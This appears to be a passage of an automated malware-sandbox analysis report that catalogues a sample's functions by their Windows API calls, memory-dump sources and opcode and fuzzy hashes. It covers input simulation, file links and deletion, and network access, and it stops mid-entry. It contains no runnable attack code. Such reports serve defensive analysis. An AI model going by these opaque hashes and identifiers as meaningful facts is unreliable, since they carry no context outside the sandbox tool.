                                                                        • GetWindowRect.USER32(015E6678,?), ref: 00EDC544
                                                                        • ScreenToClient.USER32(?,00000002), ref: 00EDC574
                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00EDC5DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: 9cf95e13be6feed4fb30e2f3b8dd771465ef08f5b80570a918fd148579537e42
                                                                        • Instruction ID: 5ec364b365d3a417c29c9d62b683dce0490295cf80d2c9553b2202ead75af81c
                                                                        • Opcode Fuzzy Hash: 9cf95e13be6feed4fb30e2f3b8dd771465ef08f5b80570a918fd148579537e42
                                                                        • Instruction Fuzzy Hash: A9516E75900109EFCF10DF68D881AAE7BB6FB45764F20925AF825AB390D730ED42CB90
                                                                        Function 00EAC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EAC462
                                                                        • __itow.LIBCMT ref: 00EAC49C
                                                                          • Part of subcall function 00EAC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EAC753
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EAC505
                                                                        • __itow.LIBCMT ref: 00EAC55A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 268b8cf91c18c3da5d42c5061724fa775dc6c738f04a22f3f59f75b5fc97e1c8
                                                                        • Instruction ID: 6a060a019aa579166d4ebf58e70523def0e5c11c0622f8daa4fd117d662feaf3
                                                                        • Opcode Fuzzy Hash: 268b8cf91c18c3da5d42c5061724fa775dc6c738f04a22f3f59f75b5fc97e1c8
                                                                        • Instruction Fuzzy Hash: 1941E531A00608AFDF25EF54C851BEE7BF9AF4E714F105059F909BB281DB70AA45CBA1
                                                                        Function 00EB390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EB3966
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EB3982
                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00EB39EF
                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00EB3A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: b30935d110dcb6fe85a4a75a25031a4a0bc9ff247b571d435db21b804eafceb0
                                                                        • Instruction ID: 7b1bea4346a7f1437b62eefde4d5a09af0f4b0cf4b6548772962a3e251f3393a
                                                                        • Opcode Fuzzy Hash: b30935d110dcb6fe85a4a75a25031a4a0bc9ff247b571d435db21b804eafceb0
                                                                        • Instruction Fuzzy Hash: F0412570E04208AEEF218B758807BFFBBB9AF85315F04215AE5C1B62D1C7B49E85D761
                                                                        Function 00EBE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EBE742
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00EBE768
                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EBE78D
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EBE7B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        • Opcode ID: d97bc324d6a280030819033f67e18730059fdcb9832e56b9f72c3721d177b335
                                                                        • Instruction ID: 86ed474635e7f86c71f6d9a8055de706cfd1d4c8f9e2bae2798c16d56ed8dc26
                                                                        • Opcode Fuzzy Hash: d97bc324d6a280030819033f67e18730059fdcb9832e56b9f72c3721d177b335
                                                                        • Instruction Fuzzy Hash: 13413539600610DFCB11EF15C445A9EBBE6BF99710B19D099E94ABB3A2CB30FC00CB91
                                                                        Function 00EDB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EDB5D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: b5dbf07212585e3973ab56db467a8f34f8fe0f90372d08c598f47fb318cfb8d4
                                                                        • Instruction ID: 9b60bbd1584688e97beaf4061a846c866ea58e1429bb22af049a8f32d8776091
                                                                        • Opcode Fuzzy Hash: b5dbf07212585e3973ab56db467a8f34f8fe0f90372d08c598f47fb318cfb8d4
                                                                        • Instruction Fuzzy Hash: 4A31AD74600108EFEB209E599C85FAD37A6EB06364F666103F662F63E1E730E9429B51
                                                                        Function 00EDD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDD807
                                                                        • GetWindowRect.USER32(?,?), ref: 00EDD87D
                                                                        • PtInRect.USER32(?,?,00EDED5A), ref: 00EDD88D
                                                                        • MessageBeep.USER32(00000000), ref: 00EDD8FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 0c408fc4de8f20b82347c689a13f2f5baae98e2f024a043b8236a22f223c85e8
                                                                        • Instruction ID: 969d949875e3327015efefaaace1c7211f28b3d91b8994b1cf73d96ce9f0b32a
                                                                        • Opcode Fuzzy Hash: 0c408fc4de8f20b82347c689a13f2f5baae98e2f024a043b8236a22f223c85e8
                                                                        • Instruction Fuzzy Hash: B741C178A08208DFCB16CF99CC81BA97BF6FF44314F1891A6E415AB354C331E846EB40
                                                                        Function 00EB3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EB3AB8
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EB3AD4
                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00EB3B34
                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EB3B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 6fded89b16d0c41fb20812d6c39c7e7ce42353955a8265595de26bc42fa559b3
                                                                        • Instruction ID: 2546d2001a56cec3efc839c817924b01c49b420c746ee76c4c46c58be64773ca
                                                                        • Opcode Fuzzy Hash: 6fded89b16d0c41fb20812d6c39c7e7ce42353955a8265595de26bc42fa559b3
                                                                        • Instruction Fuzzy Hash: 1E312470A04258AEEF318B758C5ABFFBFAA9B45314F04225AE481B32D1C7749F45C761
                                                                        Function 00EA4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA4038
                                                                        • __isleadbyte_l.LIBCMT ref: 00EA4066
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EA4094
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EA40CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 5d0f08a0269c9d4dbc02285b53cce4eee2df90bd35b89cdc01bc633cfb5c3a65
                                                                        • Instruction ID: 1e17ac77939ca2d63aecd742558b57b01f450d68c3ee281ff882deeec983112d
                                                                        • Opcode Fuzzy Hash: 5d0f08a0269c9d4dbc02285b53cce4eee2df90bd35b89cdc01bc633cfb5c3a65
                                                                        • Instruction Fuzzy Hash: AD31C370600206AFDB219F34C885BBA7BE5BF8A314F155028E651AB0D0D771E890E792
                                                                        Function 00ED7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00ED7CB9
                                                                          • Part of subcall function 00EB5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EB5F6F
                                                                          • Part of subcall function 00EB5F55: GetCurrentThreadId.KERNEL32 ref: 00EB5F76
                                                                          • Part of subcall function 00EB5F55: AttachThreadInput.USER32(00000000,?,00EB781F), ref: 00EB5F7D
                                                                        • GetCaretPos.USER32(?), ref: 00ED7CCA
                                                                        • ClientToScreen.USER32(00000000,?), ref: 00ED7D03
                                                                        • GetForegroundWindow.USER32 ref: 00ED7D09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: 6a67c5bc2ac32e556a94962daa922273ea4798e0b2ef620dd10a2d93e112b9f6
                                                                        • Instruction ID: 30da1730d91074c01015590c9b9508fcc648599eda2733145d8623e6f798bd1a
                                                                        • Opcode Fuzzy Hash: 6a67c5bc2ac32e556a94962daa922273ea4798e0b2ef620dd10a2d93e112b9f6
                                                                        • Instruction Fuzzy Hash: 4E31EC72900108AFDB11EFA5D8459FFFBF9EF98314B10946AE919F7211DB319A05CBA0
                                                                        Function 00EDF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetCursorPos.USER32(?), ref: 00EDF211
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EEE4C0,?,?,?,?,?), ref: 00EDF226
                                                                        • GetCursorPos.USER32(?), ref: 00EDF270
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EEE4C0,?,?,?), ref: 00EDF2A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: d93d09ed41be51df8d36257a0d0e74782e80c1ea4477884a42b2ae565c413d26
                                                                        • Instruction ID: 8a954f7c11a2abd50518b533a82cfaa3bad9fd7011097d0f700349ae8f1eef41
                                                                        • Opcode Fuzzy Hash: d93d09ed41be51df8d36257a0d0e74782e80c1ea4477884a42b2ae565c413d26
                                                                        • Instruction Fuzzy Hash: 8A218D39500018EFCB15DF95D859EFA7BB6FB49324F04446AF90A6B2A1D3309952DB50
                                                                        Function 00EC431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EC4358
                                                                          • Part of subcall function 00EC43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EC4401
                                                                          • Part of subcall function 00EC43E2: InternetCloseHandle.WININET(00000000), ref: 00EC449E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: a5b68677c49723164e7f6f1a683a755a9c109c106db57a4546885c61dd9e3ec1
                                                                        • Instruction ID: 1201ce10baa6099764b5f33103095d1d5dd21c80b61dd4efc3b4b8b6edc33748
                                                                        • Opcode Fuzzy Hash: a5b68677c49723164e7f6f1a683a755a9c109c106db57a4546885c61dd9e3ec1
                                                                        • Instruction Fuzzy Hash: DB2104B1200601BFDB119F648D10FBBBBE9FFC4714F10501EBA05A66D0D77298229790
                                                                        Function 00EC8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00EC8AE0
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00EC8AF2
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00EC8AFF
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: a069a520707e49df456ba496a373e03f3a925b1f301b21b70eccdb7b2af0e7a5
                                                                        • Instruction ID: fd7841bb7d730fc487ace4b850365109e3dfddc6e64e75c06263ccfc62f340f5
                                                                        • Opcode Fuzzy Hash: a069a520707e49df456ba496a373e03f3a925b1f301b21b70eccdb7b2af0e7a5
                                                                        • Instruction Fuzzy Hash: 54219671A001249FC7119F69CD85AAEBBFCEF89310F00516AF849E7291DB749D45CF90
                                                                        Function 00ED8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00ED8AA6
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00ED8AC0
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00ED8ACE
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00ED8ADC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 40822dc024dc588862e1b667164d62a76bc4186c276dcd540ceda68e66224ae7
                                                                        • Instruction ID: 853b9a92ba1cf5cfae9c9d6c681bac3955bc4004d14c710c724d5c540da6419f
                                                                        • Opcode Fuzzy Hash: 40822dc024dc588862e1b667164d62a76bc4186c276dcd540ceda68e66224ae7
                                                                        • Instruction Fuzzy Hash: 2B117F31309111AFD745AB25CD05FBA77E9EF85321F14911AF92AEB2E2CB70AD01C794
                                                                        Function 00EB0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EB1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EB0ABB,?,?,?,00EB187A,00000000,000000EF,00000119,?,?), ref: 00EB1E77
                                                                          • Part of subcall function 00EB1E68: lstrcpyW.KERNEL32(00000000,?,?,00EB0ABB,?,?,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB1E9D
                                                                          • Part of subcall function 00EB1E68: lstrcmpiW.KERNEL32(00000000,?,00EB0ABB,?,?,?,00EB187A,00000000,000000EF,00000119,?,?), ref: 00EB1ECE
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB0AD4
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB0AFA
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EB187A,00000000,000000EF,00000119,?,?,00000000), ref: 00EB0B2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: c29ffe6eb6569ea363abdb020d011cad28d0318525073e58fb8cd4f797f1c936
                                                                        • Instruction ID: 187b97edd5bba2784965fcada98ef4d5328072c8476fbc48cb57be4fb9b1d735
                                                                        • Opcode Fuzzy Hash: c29ffe6eb6569ea363abdb020d011cad28d0318525073e58fb8cd4f797f1c936
                                                                        • Instruction Fuzzy Hash: A511D336200305AFDB25AF64DC55DBB77A9FF45354B80506AE80ADB250EB71E850C7A0
                                                                        Function 00EA2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00EA2FB5
                                                                          • Part of subcall function 00E9395C: __FF_MSGBANNER.LIBCMT ref: 00E93973
                                                                          • Part of subcall function 00E9395C: __NMSG_WRITE.LIBCMT ref: 00E9397A
                                                                          • Part of subcall function 00E9395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00E8F507,?,0000000E), ref: 00E9399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: b84a1c62242a54d3bac58912e301293e6522e590f3d0cc02a9a2c4177c9f3f91
